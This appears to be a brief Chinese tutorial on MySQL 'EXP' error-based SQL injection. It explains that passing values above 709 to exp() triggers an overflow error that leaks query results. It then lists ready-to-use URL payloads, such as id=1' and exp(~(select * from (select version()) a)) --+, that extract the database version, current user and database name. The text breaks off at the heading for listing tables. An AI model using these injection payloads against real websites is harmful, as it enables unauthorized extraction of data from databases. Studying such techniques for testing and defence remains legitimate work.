EXP函数简介
函数用法:
exp(x)
函数功能:返回e的x次方
用法示例:
EXP报错注入原理
EXP报错注入是一种通过利用溢出错误来注出数据的SQL注入方式,当传递一个大于709的值给exp()函数时,函数会发生一个溢出错误,例如:
EXP报错注入流程
EXP报错注入的目标数据库版本需要在5.5及5.5以上~
获取数据库版本信息
- http://www.example.com/?id=1' and exp(~(select * from (select version() ) a) ) --+
获取用户名相关信息
- http://www.example.com/?id=1' and exp(~(select * from (select user() ) a) ) --+
获取数据库名的信息
- http://www.example.com/?id=1' and exp(~(select * from (select database() ) a) ) --+
获取数据库的表信息
查询第一个表名信息